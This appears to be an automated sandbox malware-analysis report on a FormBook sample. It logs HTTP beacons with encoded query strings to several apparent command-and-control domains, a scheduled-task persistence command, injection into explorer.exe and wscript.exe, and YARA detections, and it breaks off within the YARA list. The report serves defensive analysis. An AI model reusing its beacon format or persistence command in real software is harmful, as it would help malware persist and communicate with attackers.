Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Mon, 27 Sep 2021 15:38:18 GMT
Connection: close
Content-Length: 183
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 75 67 65 64 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 70 72 6f 66 69 6c 65 2e 63 66 6d 3f 64 3d 74 75 6e 65 74 65 6c 26 61 6d 70 3b 65 3d 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.hugedomains.com/domain_profile.cfm?d=tunetel&amp;e=com">here</a>.</h2></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49168 | 35.168.81.157 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 17:39:07.055089951 CEST | 2 | OUT | GET /u4an/?cRrtMz2=bje5eY1RGEWNtm8ygCOrlm2ug1qlHU7639KaGd4GF1Wfo4/TJzpT6n4yoGbd2Lg1L0Vz5w==&an=lnlpiVNpa2ntv HTTP/1.1
Host: www.branchwallet.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Sep 27, 2021 17:39:07.158337116 CEST | 3 | IN | HTTP/1.1 200 OK
Date: Mon, 27 Sep 2021 15:39:07 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
                                                        Data Raw: 31 34 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 64 38 64 38 64 38 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 6d 65 62 72 69 67 68 74 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 67 2e 70 6e 67 29 20 74 6f 70 20 72 65 70 65 61 74 2d 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 70 61 67 65 42 72 6f 77 73 65 72 45 72 72 6f 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 32 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 73 68 61 64 6f 77 5f 6c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6d 61 69 6e 5f 62 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 
0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 2e 68 65 61 64 65 72 53 68 6f 72 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 36 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 20 2e 68 65 61 64 65 72 5f 69 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 34 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 6d 65 62 72 69 67 68 74 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 65 61 64 65 72 5f 62 67 2e 70 6e 67 29 20 74 6f 70 20 72 65 70 65 61 74 2d 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 20 2e 68 65 61 64 65 72 5f 74 6f 70 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 36 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 0d 0a 20 20 20
                                                        Data Ascii: 14c6<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body { background: #d8d8d8 url(https://www.namebrightstatic.com/images/bg.png) top repeat-x; } .pageBrowserError { min-height: 600px; } .container { margin: 0 auto; width: 922px; } .shadow_l { margin-left: 10px; } .main_bg { background: #fff; } #header { padding: 0 2px; background: #fff; } #header.headerShort { height: 65px; } #header .header_in { padding-right: 14px; height: 145px; overflow: hidden; background: url(https://www.namebrightstatic.com/images/header_bg.png) top repeat-x; } #header .header_top { height: 65px; overflow: hidden


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49169 | 195.77.116.8 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 17:39:12.313704967 CEST | 8 | OUT | GET /u4an/?cRrtMz2=Xsze89gQxfgRrb0U/pbtTMTkEZR7VVn3wnJWYt+8gVFiExqV2mQQrtUEc4jTVg5kW61b5Q==&an=lnlpiVNpa2ntv HTTP/1.1
Host: www.iptechcm.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Sep 27, 2021 17:39:12.386595964 CEST | 9 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 27 Sep 2021 15:39:12 GMT
Content-Type: text/html
Content-Length: 808
Connection: close
Vary: Accept-Encoding
Last-Modified: Fri, 09 Oct 2020 08:38:37 GMT
ETag: "328-5b138dffc24c6"
Accept-Ranges: bytes
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 69 73 20 70 61 67 65 20 65 69 74 68 65 72 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2c 20 6f 72 20 69 74 20 6d 6f 76 65 64 20 73 6f 6d 65 77 68 65 72 65 20 65 6c 73 65 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 
28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>404 Not Found</title> <link rel="stylesheet" href="/error_docs/styles.css"></head><body><div class="page"> <div class="main"> <h1>Server Error</h1> <div class="error-code">404</div> <h2>Page Not Found</h2> <p class="lead">This page either doesn't exist, or it moved somewhere else.</p> <hr/> <p>That's what you can do</p> <div class="help-actions"> <a href="javascript:location.reload();">Reload Page</a> <a href="javascript:history.back();">Back to Previous Page</a> <a href="/">Home Page</a> </div> </div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49170 | 217.160.0.222 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 17:39:17.484231949 CEST | 10 | OUT | GET /u4an/?cRrtMz2=Ea+fIX+qvB9rXsVioouSESAKF/QLNUis3qIxLYsU8whjNSMesV9wMQUCyx2IDzdIrw8QIA==&an=lnlpiVNpa2ntv HTTP/1.1
Host: www.pizza-mio.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Sep 27, 2021 17:39:17.509183884 CEST | 11 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 601
Connection: close
Date: Mon, 27 Sep 2021 15:39:17 GMT
Server: Apache
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.22 | 49171 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 17:39:22.562083006 CEST | 12 | OUT | GET /u4an/?cRrtMz2=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw==&an=lnlpiVNpa2ntv HTTP/1.1
Host: www.wwiilive.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Sep 27, 2021 17:39:22.675501108 CEST | 12 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Mon, 27 Sep 2021 15:39:22 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6142f053-113"
Via: 1.1 google
Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        5192.168.2.224917281.169.145.7780C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Sep 27, 2021 17:39:27.779182911 CEST13OUTGET /u4an/?cRrtMz2=wU8NyZPkNGRQQpssl8Iv49O+whrQvSeXFC/S+Kx28E86ZZkWNSugarjcLE+3raO3NGyltw==&an=lnlpiVNpa2ntv HTTP/1.1
                                                        Host: www.play-to-escape.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Sep 27, 2021 17:39:27.804255962 CEST | 13 | IN | HTTP/1.1 404 Not Found
                                                        Date: Mon, 27 Sep 2021 15:39:27 GMT
                                                        Server: Apache/2.4.49 (Unix)
                                                        Content-Length: 196
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        6 | 192.168.2.22 | 49173 | 5.101.152.161 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Sep 27, 2021 17:39:32.950460911 CEST | 14 | OUT | GET /u4an/?cRrtMz2=vtjrYftuZe8iaBtQ/TWxrabmNpKe1jOOTYTB1/nX+Um4K24Q/B9FUBqnYP2A+q8J0+YELg==&an=lnlpiVNpa2ntv HTTP/1.1
                                                        Host: www.yhomggsmtdynchb.store
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Sep 27, 2021 17:39:33.020418882 CEST | 15 | IN | HTTP/1.1 404 Not Found
                                                        Server: nginx-reuseport/1.21.1
                                                        Date: Mon, 27 Sep 2021 15:39:33 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 292
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /u4an/ was not found on this server.</p><hr><address>Apache/2.4.10 (Unix) Server at www.yhomggsmtdynchb.store Port 80</address></body></html>


                                                        Code Manipulations

                                                        Statistics

                                                        Behavior


                                                        System Behavior

                                                        General

                                                        Start time:17:37:21
                                                        Start date:27/09/2021
                                                        Path:C:\Users\user\Desktop\ejecutable2.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\Desktop\ejecutable2.exe'
                                                        Imagebase:0x1120000
                                                        File size:834048 bytes
                                                        MD5 hash:2D359D2C999CCB15BC71229BB0275BB6
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.424438137.000000000265F000.00000004.00000001.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        General

                                                        Start time:17:37:25
                                                        Start date:27/09/2021
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\CmsVPZkxbOtm' /XML 'C:\Users\user\AppData\Local\Temp\tmp86AE.tmp'
                                                        Imagebase:0x990000
                                                        File size:179712 bytes
                                                        MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:17:37:26
                                                        Start date:27/09/2021
                                                        Path:C:\Users\user\Desktop\ejecutable2.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\ejecutable2.exe
                                                        Imagebase:0x1120000
                                                        File size:834048 bytes
                                                        MD5 hash:2D359D2C999CCB15BC71229BB0275BB6
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low

                                                        General

                                                        Start time:17:37:27
                                                        Start date:27/09/2021
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Explorer.EXE
                                                        Imagebase:0xffa10000
                                                        File size:3229696 bytes
                                                        MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low

                                                        General

                                                        Start time:17:37:51
                                                        Start date:27/09/2021
                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\wscript.exe
                                                        Imagebase:0xab0000
                                                        File size:141824 bytes
                                                        MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, Author: Joe Security
